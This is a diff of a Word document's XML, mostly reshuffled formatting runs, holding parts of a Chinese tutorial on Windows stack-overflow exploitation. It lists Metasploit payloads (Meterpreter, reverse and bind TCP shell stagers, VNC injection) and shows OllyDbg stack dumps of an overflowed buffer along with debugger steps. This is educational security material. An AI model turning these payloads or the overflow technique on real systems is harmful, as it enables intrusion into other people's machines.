+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Inject DLL, Reverse All-Port TCP Stager</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3450,7 +4110,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>/bind_ipv6_tcp                          normal  Windows Meterpreter (</w:t>
+        <w:t xml:space="preserve">/bind_ipv6_tcp                          </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Meterpreter (</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3487,7 +4155,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                          normal  Windows Meterpreter (</w:t>
+        <w:t xml:space="preserve">                          </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Meterpreter (</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3524,7 +4200,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                               normal  Windows Meterpreter (</w:t>
+        <w:t xml:space="preserve">                               </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Meterpreter (</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3553,7 +4237,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>/reverse_ipv6_tcp                       normal  Windows Meterpreter (</w:t>
+        <w:t xml:space="preserve">/reverse_ipv6_tcp                       </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Meterpreter (</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3590,7 +4282,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                       normal  Windows Meterpreter (</w:t>
+        <w:t xml:space="preserve">                       </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Meterpreter (</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3627,7 +4327,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                        normal  Windows Meterpreter (</w:t>
+        <w:t xml:space="preserve">                        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Meterpreter (</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3664,7 +4372,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                            normal  Windows Meterpreter (</w:t>
+        <w:t xml:space="preserve">                            </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Meterpreter (</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3701,7 +4417,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                   normal  Windows Meterpreter (</w:t>
+        <w:t xml:space="preserve">                   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Meterpreter (</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3722,7 +4446,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">   windows/shell/bind_ipv6_tcp                                       normal  Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)</w:t>
+        <w:t xml:space="preserve">   windows/shell/bind_ipv6_tcp                                       </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Command Shell, Bind IPv6 TCP Stager (Windows x86)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3735,7 +4467,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                       normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)</w:t>
+        <w:t xml:space="preserve">                                       </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Command Shell, Bind TCP Stager (No NX or Win7)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3748,12 +4488,28 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                            normal  Windows Command Shell, Bind TCP Stager (Windows x86)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">   windows/shell/reverse_ipv6_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (IPv6)</w:t>
+        <w:t xml:space="preserve">                                            </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Command Shell, Bind TCP Stager (Windows x86)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   windows/shell/reverse_ipv6_tcp                                    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Command Shell, Reverse TCP Stager (IPv6)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3766,7 +4522,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                    normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)</w:t>
+        <w:t xml:space="preserve">                                    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Command Shell, Reverse TCP Stager (No NX or Win7)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3779,7 +4543,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                     normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)</w:t>
+        <w:t xml:space="preserve">                                     </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3792,7 +4564,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                         normal  Windows Command Shell, Reverse TCP Stager</w:t>
+        <w:t xml:space="preserve">                                         </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Command Shell, Reverse TCP Stager</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3805,7 +4585,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                normal  Windows Command Shell, Reverse All-Port TCP Stager</w:t>
+        <w:t xml:space="preserve">                                </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Command Shell, Reverse All-Port TCP Stager</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3818,11 +4606,19 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                               normal  </w:t>
+        <w:t xml:space="preserve">                                               </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">normal  </w:t>
       </w:r>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Windows Speech API - Say "You Got </w:t>
+        <w:t>Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Speech API - Say "You Got </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3843,7 +4639,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>/bind_ipv6_tcp                                      normal  Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)</w:t>
+        <w:t xml:space="preserve">/bind_ipv6_tcp                                      </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Upload/Execute, Bind IPv6 TCP Stager (Windows x86)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3864,7 +4668,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                      normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)</w:t>
+        <w:t xml:space="preserve">                                      </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Upload/Execute, Bind TCP Stager (No NX or Win7)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3885,7 +4697,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                           normal  Windows Upload/Execute, Bind TCP Stager (Windows x86)</w:t>
+        <w:t xml:space="preserve">                                           </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Upload/Execute, Bind TCP Stager (Windows x86)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3898,7 +4718,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>/reverse_ipv6_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)</w:t>
+        <w:t xml:space="preserve">/reverse_ipv6_tcp                                   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Upload/Execute, Reverse TCP Stager (IPv6)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3919,7 +4747,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                   normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)</w:t>
+        <w:t xml:space="preserve">                                   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Upload/Execute, Reverse TCP Stager (No NX or Win7)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3940,7 +4776,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                    normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)</w:t>
+        <w:t xml:space="preserve">                                    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3961,7 +4805,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                        normal  Windows Upload/Execute, Reverse TCP Stager</w:t>
+        <w:t xml:space="preserve">                                        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Upload/Execute, Reverse TCP Stager</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3982,7 +4834,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                               normal  Windows Upload/Execute, Reverse All-Port TCP Stager</w:t>
+        <w:t xml:space="preserve">                               </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  Windows</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Upload/Execute, Reverse All-Port TCP Stager</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3995,7 +4855,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>/bind_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)</w:t>
+        <w:t xml:space="preserve">/bind_ipv6_tcp                                   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  VNC</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4016,7 +4884,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)</w:t>
+        <w:t xml:space="preserve">                                   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  VNC</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Server (Reflective Injection), Bind TCP Stager (No NX or Win7)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4037,7 +4913,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                        normal  VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)</w:t>
+        <w:t xml:space="preserve">                                        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  VNC</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Server (Reflective Injection), Bind TCP Stager (Windows x86)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4050,7 +4934,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>/reverse_ipv6_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)</w:t>
+        <w:t xml:space="preserve">/reverse_ipv6_tcp                                </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  VNC</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Server (Reflective Injection), Reverse TCP Stager (IPv6)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4071,7 +4963,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)</w:t>
+        <w:t xml:space="preserve">                                </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  VNC</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4092,7 +4992,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                 normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)</w:t>
+        <w:t xml:space="preserve">                                 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  VNC</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4113,7 +5021,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                                     normal  VNC Server (Reflective Injection), Reverse TCP Stager</w:t>
+        <w:t xml:space="preserve">                                     </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  VNC</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Server (Reflective Injection), Reverse TCP Stager</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4134,7 +5050,15 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve">                            normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager</w:t>
+        <w:t xml:space="preserve">                            </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>normal  VNC</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Server (Reflective Injection), Reverse All-Port TCP Stager</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -4382,22 +5306,54 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>0012FB68  /0012FF80  €.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>0012FB6C  |0040131D  @.  返回到 target_s.0040131D 来自 target_s.0040101E</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>0012FB70  |0012FD50  P?.   ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>0012FB74  |0012B74C  L?.</w:t>
+        <w:t>0012FB</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>68  /</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>0012FF80  €.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>0012FB6</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>C  |</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>0040131D  @.  返回到 target_s.0040131D 来自 target_s.0040101E</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>0012FB</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>70  |</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>0012FD50  P?.   ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>0012FB</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>74  |</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>0012B74C  L?.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4429,33 +5385,48 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">0012FB60   61616161  </w:t>
+        <w:t xml:space="preserve">0012FB60   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">61616161  </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>aaaa</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">0012FB64   61616161  </w:t>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">0012FB64   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">61616161  </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>aaaa</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">0012FB68   61616161  </w:t>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">0012FB68   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">61616161  </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>aaaa</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:r>
@@ -4486,7 +5457,21 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>可以看到完成了信息输出，并且要返回，可以看到栈的布局</w:t>
+        <w:t>可以看到完成了信息输出，并且要返回，可以看到</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>栈</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>的布局</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4637,7 +5622,15 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>target_s.couth_threshold_length</w:t>
+        <w:t>target_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>s.couth</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>_threshold_length</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
@@ -4652,7 +5645,15 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>target_s.couth_threshold_length</w:t>
+        <w:t>target_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>s.couth</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>_threshold_length</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
@@ -4692,10 +5693,16 @@
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>然后继续单步走，走下去，F4到这</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
+        <w:t>F8单步走</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -4705,7 +5712,7 @@
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="2966720"/>
             <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
-            <wp:docPr id="6" name="图片 6"/>
+            <wp:docPr id="12" name="图片 12"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -4713,7 +5720,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="6" name="0day2-4-2.7.png"/>
+                    <pic:cNvPr id="12" name="0day2-4-2.6.png"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -4743,14 +5750,22 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>然后F8单步</w:t>
-      </w:r>
+        <w:t>然后继续单步走，走下去，F4到这</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:r>
@@ -4762,7 +5777,7 @@
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="2966720"/>
             <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
-            <wp:docPr id="7" name="图片 7"/>
+            <wp:docPr id="6" name="图片 6"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -4770,7 +5785,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="7" name="0day2-4-2.8.png"/>
+                    <pic:cNvPr id="6" name="0day2-4-2.7.png"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -4806,21 +5821,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>可以看到解码的代码，所以，按照上一篇文章讲的，在</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>cld</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>下断点然后F9就行了</w:t>
+        <w:t>然后F8单步</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4834,7 +5835,7 @@
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="2966720"/>
             <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
-            <wp:docPr id="10" name="图片 10"/>
+            <wp:docPr id="7" name="图片 7"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -4842,7 +5843,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="10" name="0day2-4-2.9.png"/>
+                    <pic:cNvPr id="7" name="0day2-4-2.8.png"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -4878,7 +5879,21 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
